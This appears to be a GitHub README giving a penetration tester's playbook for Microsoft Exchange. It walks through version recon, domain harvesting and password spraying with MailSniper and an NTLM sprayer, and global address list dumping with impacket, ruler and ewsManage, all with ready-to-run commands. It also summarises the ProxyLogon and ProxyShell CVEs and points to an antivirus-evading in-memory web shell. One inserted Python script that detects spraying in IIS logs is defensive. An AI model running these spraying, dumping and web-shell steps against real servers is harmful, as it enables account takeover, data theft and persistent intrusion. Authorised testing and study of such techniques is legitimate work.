kh4sh3i/exchange-penetration-testing

exchange penetration testing

The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)

1) Recon

sudo python3 get_exchange_version.py https://mail.target.com

2) Bruteforce

Enumerate the domain with MailSniper:

Import-Module MailSniper.ps1
Invoke-DomainHarvestOWA -ExchHostname mail.domain.com

Password spray

  • PasswordSprayOWA: attempts to connect to an OWA portal and performs a password-spraying attack using a user list and a single password.
  • PasswordSprayEWS: attempts to connect to an EWS portal and performs a password-spraying attack using a user list and a single password.
Import-Module MailSniper.ps1
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt

Python NTLM password spray

python3 bruteforce/bruteforce.py -t https://mail.domain.com/EWS/Exchange.asmx -U users.txt -p TestPassword
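The spraying above leaves a distinctive trace on the server. As an added detection example (not code from this repository or from MailSniper), the script below reads IIS W3C log lines in an assumed, simplified column layout and flags any source IP that tries many distinct usernames against the OWA/EWS authentication endpoints inside a short window; the sample log lines are constructed.

```python
"""Flag password-spray activity against OWA/EWS in IIS W3C log lines.
Added defender-side example, not code from this repository or MailSniper.
Assumed (constructed) columns: date time cs-uri-stem cs-username c-ip sc-status.
Signature: many distinct usernames from one source IP against the auth endpoints
in a short window. Outcome is ignored on purpose: OWA answers good and bad
logons alike with a 302, so sc-status alone does not separate them."""
from collections import defaultdict
from datetime import datetime

AUTH_PATHS = ("/owa/auth.owa", "/ews/exchange.asmx")

# Constructed sample: 203.0.113.9 sprays six accounts in 20 s; 198.51.100.7 is one user retrying.
SAMPLE_LOG = """\
2021-04-01 08:00:01 /owa/auth.owa alice 203.0.113.9 302
2021-04-01 08:00:04 /owa/auth.owa bob 203.0.113.9 302
2021-04-01 08:00:07 /owa/auth.owa carol 203.0.113.9 302
2021-04-01 08:00:11 /EWS/Exchange.asmx dave 203.0.113.9 401
2021-04-01 08:00:15 /EWS/Exchange.asmx erin 203.0.113.9 401
2021-04-01 08:00:19 /owa/auth.owa frank 203.0.113.9 302
2021-04-01 08:00:20 /owa/auth.owa alice 198.51.100.7 302
2021-04-01 08:00:40 /owa/auth.owa alice 198.51.100.7 302
"""

def parse_line(line):
    """Return (timestamp, ip, user) for a named-user hit on an auth endpoint, else None."""
    parts = line.split()
    if len(parts) != 6:
        return None
    date, time, path, user, ip, _status = parts
    if path.lower() not in AUTH_PATHS or user == "-":   # "-" is IIS's anonymous marker
        return None
    return datetime.fromisoformat(f"{date} {time}"), ip, user.lower()

def detect_spray(log_text, window_seconds=300, min_users=5):
    """Map each suspicious source IP to the largest number of distinct usernames
    it tried inside any window_seconds-long window; IPs below min_users are omitted."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            attempts[rec[1]].append((rec[0], rec[2]))
    hits = {}
    for ip, events in attempts.items():
        events.sort()          # the sliding window needs time order per source
        best = 0
        for i, (start, _) in enumerate(events):
            users = {u for ts, u in events[i:] if (ts - start).total_seconds() <= window_seconds}
            best = max(best, len(users))
        if best >= min_users:
            hits[ip] = best
    return hits
```

Tune `window_seconds` and `min_users` to the site; a NAT gateway or proxy that fronts many real users will look like a single busy source and needs a higher threshold or a per-source baseline.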

3) GAL

The Microsoft Exchange Global Address List (GAL) is a list of all end users and their respective email addresses within an Exchange Server organization that uses Microsoft Outlook for email.

Use exchanger.py (impacket):

python GAL/exchanger.py DomainName/Username:"Password"@mail.domain.com nspi list-tables

Use ruler:

GAL/ruler-linux64 --url https://mail.domain.com/autodiscover/autodiscover.xml --email [email protected] -d DomainName -u Username -p Password --debug --verbose  abk dump --output gal.txt 

Use ewsManage.py:

python3 GAL/ewsManage.py mail.domain.com 443 plaintext DomainName Username Password findallpeopl
  • To export the GAL you first need a valid username, password and email address.

4) ProxyLogon

ProxyLogon is the formal generic name for CVE-2021-26855, a vulnerability in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate an administrator. It has also been chained with a post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.

5) ProxyShell

CVE-2021-34473, Microsoft Exchange Server Remote Code Execution Vulnerability: faulty URL normalization lets an attacker reach an arbitrary backend URL while running as the Exchange Server machine account. Although this bug is not as powerful as the SSRF in ProxyLogon, and only the path part of the URL could be manipulated

6) WebShell

  • GhostWebShell (author: Soroush Dalili, @irsdl) is loaded only in RAM and is not detected by AV.
  • It is useful in ProxyLogon and ProxyShell exploitation.

Use GhostWebShell.cs.

Most well-known CVEs

  • CVE-2021-31206
  • CVE-2021-31207
  • CVE-2021-34473
  • CVE-2021-34523
  • CVE-2021-26855
  • CVE-2021-26857
  • CVE-2021-26858
  • CVE-2021-27065
  • CVE-2015-1635
